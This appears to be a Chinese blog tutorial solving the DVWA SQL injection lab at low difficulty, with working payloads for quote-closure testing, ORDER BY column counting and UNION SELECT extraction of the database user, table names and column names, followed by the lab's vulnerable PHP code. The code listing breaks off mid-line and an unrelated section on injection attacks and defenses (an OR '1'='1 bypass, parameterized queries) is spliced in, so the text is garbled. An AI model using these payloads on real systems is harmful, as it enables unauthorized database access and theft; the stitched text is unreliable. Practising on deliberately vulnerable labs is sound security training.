owaspbwa-DVWA-SQL注入

前言:

DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
知识储备:
需要有php、mysql的基础知识,了解sql注入的基本原理

环境

使用VM加载靶机的.ova文件,VM的虚拟机都是可以加载的。
靶机百度网盘下载链接:
https://pan.baidu.com/s/1KaXy5KnXP7Td8s-3zPgalw 密码: jqq7

对于有回显的注入一般的思路就是:拼接sql语句使得查询结果可以显示在页面上。最终得到表名,字段名等敏感数据。

low等级难度

注入过程:
输入合法参数1 ,页面正常输出,有回显位,输入的内容在url中可见,说明是get类型传参,参数是id

在这里插入图片描述

查看闭合方式

1 and 1=2 不报错,页面内容正常显示,不是整型闭合
在这里插入图片描述

1' and 1=2报错 说明'导致语法错误
在这里插入图片描述
1' and 1=2 --+ ,页面无内容,但语法正确
在这里插入图片描述
即闭合方式:'
在这里插入图片描述
对于有回显的情况,尝试报错注入的思路

查看字段数

1' order by 2 页面正常
在这里插入图片描述
1' order by 3 --+//页面报错
在这里插入图片描述

得到字段数为:2

union查询 库-表-字段

查询库名和数据库用户名:1.1' union select user(),database() --+
在这里插入图片描述

查询当前数据库的所有表

1.1'union select 1,group_concat(table_name) from information_schema.tables  where table_schema=database()--+ 

在这里插入图片描述
查看users表中的所有字段

1.1'union select 1,group_concat(column_name) from information_schema.columns  where table_name='users'--+ 

在这里插入图片描述

源码分析:


<?php    

if(isset($_GET['Submit'])){
   
   
    
    // Retrieve data
    
    $id = $_GET['id']; //没有对$id 做任何的过滤与检查

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die('<pre>' . mysql_error() 
### SQL注入攻击与防御方法 #### 攻击方式 在DVWA (Damn Vulnerable Web Application) 中,SQL 注入漏洞存在于多个功能模块内。当应用程序未能正确过滤用户输入并将其直接拼接到SQL查询语句中时,就可能发生SQL注入。 例如,在登录表单处尝试提交如下用户名和密码组合: ```sql ' OR '1'='1 ``` 这将导致数据库执行条件始终成立的查询[^1]。 对于更复杂的场景,可以利用布尔盲注技术来逐位猜解出隐藏的信息。通过发送精心构造的数据包给服务器,并观察响应时间或页面返回内容的变化来进行判断[^2]。 #### 防御措施 为了防止SQL注入的发生,应该采取以下几种主要策略: - **参数化查询**:使用预编译语句代替字符串连接构建SQL命令。这样即使恶意代码被插入到变量之中也不会改变原有逻辑结构。 Python中的`sqlite3`库提供了这样的接口: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() user_input = "some input" query = "SELECT * FROM users WHERE username=?;" cursor.execute(query, (user_input,)) ``` - **存储过程调用**:把业务操作封装成存储过程的形式,在应用层只负责传递必要的参数而不涉及具体语法细节。 - **最小权限原则**:确保用于访问数据库的应用程序账户仅具有完成其工作所需的最低限度权利;比如读取特定表格而不是整个数据库的所有对象。 - **输入验证**:严格限定允许接收字符集范围内的数据项长度以及格式等属性,拒绝不符合规则的内容进入后续处理流程之前就被拦截下来[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值